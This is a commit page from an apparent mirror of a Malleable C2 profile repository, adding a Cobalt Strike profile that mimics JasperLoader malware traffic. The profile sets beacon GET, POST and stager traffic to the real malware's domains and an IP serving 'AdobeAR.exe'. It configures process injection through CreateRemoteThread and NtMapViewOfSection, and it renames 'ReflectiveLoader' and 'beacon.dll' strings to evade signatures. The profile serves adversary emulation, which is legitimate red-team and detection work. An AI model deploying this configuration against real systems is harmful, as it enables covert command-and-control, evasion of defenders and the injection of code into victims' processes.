infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create jasperloader.profile

master
xx0hcd 2019-05-24 16:18:00 -05:00 committed by GitHub
parent 6dfce7d8b0
commit 56ddb7a407
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 223 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

223
crimeware/jasperloader.profile Normal file
View File

@ -0,0 +1,223 @@
#jasperloader.profile
#https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html
#https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
#xx0hcd
###global options###
#sleeptime from report, image 'Figure 22: Stage 2 — JavaScript retrieval'
set sleeptime "180000";
set jitter "33";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
set sample_name "jasperloader.profile";
http-get {
set uri "/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php";
set verb "GET";
client {
header "Host" "cdn.zaczvk.pl";
header "Connection" "Keep-Alive";
metadata {
base64url;
parameter "vid";
}
}
server {
header "Server" "nginx/1.14.2";
header "Content-Type" "text/html; charset=UTF-8";
header "Connection" "keep-alive";
header "X-Powered-By" "PHP/5.4.16";
output {
netbios;
prepend "\nfiuyc= \"";
append "\";\n";
append "xfbjixjsytvxjyuvcaxhfehv = new Array();\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"i95BtfTT\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"C(\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"wVC3Ea\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"93V6x46z\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"9E7txtA6tRS3>SzSt4w\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"Bv9\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"xta7\")\n";
append "xfbjixjsytvxjyuvcaxhfehv.push(\"49\")\n";
print;
}
}
}
http-post {
set uri "/";
set verb "GET";
#set verb "POST";
client {
header "Host" "space.bajamelide.ch";
header "Connection" "Keep-Alive";
output {
base64url;
parameter "b";
}
id {
base64url;
parameter "v";
}
parameter "psver" "5";
}
server {
header "Server" "nginx/1.14.2";
header "Content-Type" "text/html; charset=UTF-8";
header "Content-Length" "89";
header "Connection" "keep-alive";
header "X-Powered-By" "PHP/5.4.16";
output {
netbios;
# prepend "\n";
prepend "d|http://31.214.157.69/";
append "|AdobeAR.exe|http://cdn.zaczvk.pl/moddownloadok.php";
print;
}
}
}
http-stager {
set uri_x86 "/501";
set uri_x64 "/502";
client {
header "Host" "cloud.diminishedvaluecalifornia.com";
header "Connection" "Keep-Alive";
parameter "dwgvhgc" "";
}
server {
header "Server" "Apache/2.2.15 (CentOS)";
header "Last-Modified" "Tue, 22 Jan 2019 16:31:28 GMT";
header "ETag" "9f688-4-5800e82560818";
header "Accept-Ranges" "bytes";
header "Content-Length" "4";
header "Connection" "close";
header "Content-Type" "text/html; charset=UTF-8";
output{
prepend "500\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print;
}
}
}
###Malleable PE Options###
post-ex {
set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
set obfuscate "false";
set smartinject "false";
set amsi_disable "false";
}
#used peclone on sample from 2nd stage gootkit using same domains, https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
stage {
set checksum "0";
set compile_time "15 Apr 2015 01:24:00";
set entry_point "8208";
set image_size_x86 "2560000";
set image_size_x64 "2560000";
#set name "";
set userwx "false";
set cleanup "false";
set sleep_mask "false";
set stomppe "false";
set obfuscate "false";
set rich_header "";
set sleep_mask "false";
# set module_x86 "";
# set module_x64 "";
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "6ayBRVW";
strrep "beacon.dll" "uVRWRut";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "6ayBRVW";
strrep "beacon.x64.dll" "uVRWRut";
}
#can set a string in the .rdata section of the beacon dll.
#adds a zero-terminated string
#string "something";
#adds a string 'as-is'
#data "something";
#adds a wide (UTF-16LE encoded) string
stringw "IMAGE_SCN_MEM_READ";
}
#controls process injection behavior
process-inject {
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
}